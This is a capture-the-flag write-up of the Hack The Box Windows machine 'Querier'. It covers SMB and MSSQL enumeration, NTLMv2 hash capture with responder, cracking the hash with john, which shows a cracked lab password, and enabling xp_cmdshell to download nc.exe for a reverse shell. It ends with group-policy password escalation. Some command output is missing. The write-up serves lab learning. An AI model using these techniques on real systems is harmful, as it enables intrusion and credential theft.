Hey guys today Querier retired and here’s my write-up about it. It was a great windows machine covering some interesting stuff and I enjoyed it.I wrote two posts for this machine, first one solving it with kali and the other one solving it with commando vm, you can find the second post here. It’s a Windows box and its ip is 10.10.10.125, I added it to /etc/hosts as querier.htb. Let’s jump right in!
As always we will start with nmap to scan for open ports and services : nmap -sV -sT -sC querier.htb
We got smb and mssql server on port 1433. Let’s check smb.
We need to list the shares first. I used smbclient :
1 2 3 4 5 6 7 8 9 10 11 12
smbclient --list //querier.htb/ -U "" Enter WORKGROUP\'s password:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reports Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to querier.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Failed to connect with SMB1 -- no workgroup available
Obviously if there’s an anonymously accessible share it will be Reports, Let’s see what’s in there :
1 2 3 4 5 6 7 8 9
root@kali:~/Desktop/HTB/boxes/querier# smbclient //querier.htb/Reports/ -U "" Enter WORKGROUP\'s password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 28 18:23:48 2019 .. D 0 Mon Jan 28 18:23:48 2019 Currency Volume Report.xlsm A 12229 Sun Jan 27 17:21:34 2019
6469119 blocks of size 4096. 1608855 blocks available
Only an Excel file.
1 2 3
smb: \> get "Currency Volume Report.xlsm" getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (17.1 KiloBytes/sec) (average 17.1 KiloBytes/sec) smb: \>
Password: [*] Encryption required, switching to TLS [-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.
I added the windows authentication option (-windows-auth) and it worked :
Unfortunately … permission denied for xp_cmdshell :
1 2 3 4 5
SQL> enable_xp_cmdshell [-] ERROR(QUERIER): Line 105: User does not have permission to perform this action. [-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement. [-] ERROR(QUERIER): Line 105: User does not have permission to perform this action. [-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
I ran responder (responder -I tun0) and used xp_dirtree to see what hashes can I catch :
And we got the NTLMv2 hash for mssql-svc. I used john and rockyou to crack the hash :
1 2 3 4 5 6 7 8 9 10
root@kali:~/Desktop/HTB/boxes/querier# john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status corporate568 (mssql-svc) 1g 0:00:00:07 DONE (2019-06-21 07:41) 0.1321g/s 1184Kp/s 1184Kc/s 1184KC/s correforenz..corby909 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed
Now it’s time to enable xp_cmdshell and get a reverse shell.
We have RCE. I ran a python server to host nc.exe then I used Invoke-WebRequest to download it :
One of the things to check when enumerating Windows machines is group policy passwords which happened to be the privilege escalation vector here. I checked group policy passwords and found Administrator’s password :